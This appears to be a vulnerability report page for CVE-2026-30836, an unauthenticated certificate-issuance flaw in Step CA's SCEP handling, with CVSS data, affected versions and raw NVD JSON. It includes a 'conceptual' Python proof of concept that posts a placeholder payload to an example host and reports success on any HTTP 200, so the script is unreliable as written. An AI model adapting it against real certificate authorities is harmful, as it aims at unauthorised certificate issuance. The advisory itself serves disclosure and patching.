Security Vulnerability Report
中文
CVE-2026-30836 CVSS 10.0 CRITICAL

CVE-2026-30836

Published: 2026-03-19 21:17:10
Last Modified: 2026-04-27 13:41:55
Source: [email protected]

Description

Step CA is an online certificate authority for secure, automated certificate management for DevOps. Versions 0.30.0-rc6 and below do not safeguard against unauthenticated certificate issuance through the SCEP UpdateReq. This issue has been fixed in version 0.30.0.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:smallstep:step-ca:*:*:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:smallstep:step-ca:0.30.0:rc1:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:smallstep:step-ca:0.30.0:rc2:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:smallstep:step-ca:0.30.0:rc3:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:smallstep:step-ca:0.30.0:rc4:*:*:*:go:*:* - VULNERABLE
Step CA <= 0.30.0-rc6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import base64 # Conceptual Proof of Concept for CVE-2026-30836 # Demonstrates the lack of authentication in SCEP UpdateReq target_host = "https://step-ca.example.com" scep_endpoint = "/scep" def generate_malicious_scep_request(): # In a real exploit, this would be a valid PKCS#7 or CSR structure # wrapped specifically for the SCEP UpdateReq operation. mock_payload = "<Malicious_SCEP_UpdateReq_Content>" return base64.b64encode(mock_payload.encode()).decode() def exploit(): print(f"[*] Targeting {target_host}{scep_endpoint}...") headers = { "Content-Type": "application/x-pki-message" } data = { "operation": "PKIOperation", "message": generate_malicious_scep_request() } try: # Note: No authentication token or credentials are sent response = requests.post(target_host + scep_endpoint, data=data, headers=headers, verify=False) if response.status_code == 200: print("[+] Success! Certificate issued without authentication.") print(f"[+] Response: {response.text[:100]}...") else: print(f"[-] Failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30836", "sourceIdentifier": "[email protected]", "published": "2026-03-19T21:17:09.783", "lastModified": "2026-04-27T13:41:54.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Step CA is an online certificate authority for secure, automated certificate management for DevOps. Versions 0.30.0-rc6 and below do not safeguard against unauthenticated certificate issuance through the SCEP UpdateReq. This issue has been fixed in version 0.30.0."}, {"lang": "es", "value": "Step CA es una autoridad de certificación en línea para la gestión de certificados segura y automatizada para DevOps. Las versiones 0.30.0-rc6 e inferiores no protegen contra la emisión de certificados no autenticada a través de la solicitud SCEP UpdateReq. Este problema ha sido corregido en la versión 0.30.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-295"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:smallstep:step-ca:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.30.0", "matchCriteriaId": "55DF2401-9601-4B51-9AB2-86A19579AC41"}, {"vulnerable": true, "criteria": "cpe:2.3:a:smallstep:step-ca:0.30.0:rc1:*:*:*:go:*:*", "matchCriteriaId": "D49EF50A-2928-4577-A5AD-0CD81C9E1AE8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:smallstep:step-ca:0.30.0:rc2:*:*:*:go:*:*", "matchCriteriaId": "E238C89C-4A97-4FA1-8DE0-9FE51CDF59B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:smallstep:step-ca:0.30.0:rc3:*:*:*:go:*:*", "matchCriteriaId": "36F90BB4-B07E-496D-B325-A4D9365E251C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:smallstep:step-ca:0.30.0:rc4:*:*:*:go:*:*", "matchCriteriaId": "0307DFDF-481F-4AAB-B763-6DB8B6C7A26E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:smallstep:step-ca:0.30.0:rc5:*:*:*:go:*:*", "matchCriteriaId": "D90ACCF3-B841-424A-ADA8-C957ED6A900F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:smallstep:step-ca:0.30.0:rc6:*:*:*:go:*:*", "matchCriteriaId": "F5AACCF3-DE86-4453-98DD-9D42D1164C3B"}]}]}], "references": [{"url": "https://github.com/smallstep/certificates/commit/e6da031d5125cfd99fe9a26f74bb41e4dacca4ef", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/smallstep/certificates/releases/tag/v0.30.0-rc7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/smallstep/certificates/security/advisories/GHSA-q4r8-xm5f-56gw", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.